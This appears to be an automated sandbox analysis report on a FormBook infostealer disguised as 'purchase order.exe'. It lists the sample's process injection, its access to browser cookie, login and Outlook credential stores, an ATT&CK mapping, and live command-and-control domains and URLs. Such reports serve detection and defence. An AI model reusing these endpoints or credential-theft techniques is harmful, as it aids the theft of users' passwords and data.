                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\purchase order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Software Packing                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569753 Sample: purchase order.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 31 www.aktmarket.xyz 2->31 33 www.golivenow.live 2->33 35 10 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 purchase order.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\...\purchase order.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 purchase order.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 olMGHvjsNFhNU.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 cacls.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 olMGHvjsNFhNU.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 1hong.pels5zqo.shop 129.226.153.85, 49983, 49989, 49999 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 23->37 39 www.christinascuties.net 74.208.236.156, 49793, 80 ONEANDONE-ASBrauerstrasse48DE United States 23->39 41 5 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                purchase order.exe34%ReversingLabs
                purchase order.exe40%VirustotalBrowse
                purchase order.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.christinascuties.net/raea/?yhXxt4VH=PqKj/8KuIq0WSNkKBtU6xtT3L0EMxYs1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp4la8Hrjym6l49HTLUW+OY0E4RirZFYV27mA=&7j=yfeP18RhphLhR0%Avira URL Cloudsafe
                http://www.golivenow.live/r2k9/0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/?yhXxt4VH=g6hM5OfAy0aZTOdwti/FGwGF0lxL069nbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4IM1EjQT2IGwGJnxeHmxIKuUG6sD+9Xyx6N0=&7j=yfeP18RhphLhR0%Avira URL Cloudsafe
                http://www.gk88top.top/4gxa/?yhXxt4VH=IVIViSCd4+diLw5hx6pqKzAzzXjH0VWsQQRVAN/m1p/rxaGnfzS1IkXZSHFapfjNT88wuN41KZDTvbIxWygy4ZsRlEWQLVi632NRXOHwjbynndNV+ecoPQE=&7j=yfeP18RhphLhR0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/pfw9/0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/0%Avira URL Cloudsafe
                http://www.iglpg.online/rbqc/0%Avira URL Cloudsafe
                http://www.golivenow.live/r2k9/?yhXxt4VH=R82aEe+RY/7ruopITyLMIZWKv2xl/sjUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z32+Zxn0+WKbZAwLkeWsMT5GXOfSG7vseuCs=&7j=yfeP18RhphLhR0%Avira URL Cloudsafe
                http://www.gk88top.top0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/0%Avira URL Cloudsafe
                http://www.1qcczjvh2.autos/pfw9/?yhXxt4VH=45l5W170mEENNSUnzK4z1bTcnj7w1ape/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZPlZ4cFkLSrPaRO4QE3Rmb2BtP350cPbvkbU=&7j=yfeP18RhphLhR0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR0%Avira URL Cloudsafe
                http://www.gk88top.top/4gxa/0%Avira URL Cloudsafe
                http://localhost/calculator_server/requests.php0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.aktmarket.xyz
                		13.248.169.48
                		truetrue
                  		unknown
                  iglpg.online
                  		3.33.130.190
                  		truetrue
                    		unknown
                    1hong.pels5zqo.shop
                    		129.226.153.85
                    		truetrue
                      		unknown
                      www.christinascuties.net
                      		74.208.236.156
                      		truetrue
                        		unknown
                        techmiseajour.net
                        		84.32.84.32
                        		truetrue
                          		unknown
                          www.golivenow.live
                          		66.29.149.46
                          		truetrue
                            		unknown
                            www.gk88top.top
                            		104.21.7.187
                            		truetrue
                              		unknown
                              www.techmiseajour.net
                              		unknown
                              		unknownfalse
                                		unknown
                                www.iglpg.online
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.1qcczjvh2.autos
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.iglpg.online/rbqc/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.gk88top.top/4gxa/?yhXxt4VH=IVIViSCd4+diLw5hx6pqKzAzzXjH0VWsQQRVAN/m1p/rxaGnfzS1IkXZSHFapfjNT88wuN41KZDTvbIxWygy4ZsRlEWQLVi632NRXOHwjbynndNV+ecoPQE=&7j=yfeP18RhphLhRtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.golivenow.live/r2k9/?yhXxt4VH=R82aEe+RY/7ruopITyLMIZWKv2xl/sjUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z32+Zxn0+WKbZAwLkeWsMT5GXOfSG7vseuCs=&7j=yfeP18RhphLhRtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.techmiseajour.net/jytl/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.christinascuties.net/raea/?yhXxt4VH=PqKj/8KuIq0WSNkKBtU6xtT3L0EMxYs1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp4la8Hrjym6l49HTLUW+OY0E4RirZFYV27mA=&7j=yfeP18RhphLhRtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.techmiseajour.net/jytl/?yhXxt4VH=g6hM5OfAy0aZTOdwti/FGwGF0lxL069nbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4IM1EjQT2IGwGJnxeHmxIKuUG6sD+9Xyx6N0=&7j=yfeP18RhphLhRtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.golivenow.live/r2k9/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.1qcczjvh2.autos/pfw9/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aktmarket.xyz/wb7v/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.aktmarket.xyz/wb7v/?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhRtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.gk88top.top/4gxa/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.1qcczjvh2.autos/pfw9/?yhXxt4VH=45l5W170mEENNSUnzK4z1bTcnj7w1ape/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZPlZ4cFkLSrPaRO4QE3Rmb2BtP350cPbvkbU=&7j=yfeP18RhphLhRtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabcacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersGpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bThepurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.tiro.compurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designerspurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.compurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.typography.netDpurchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
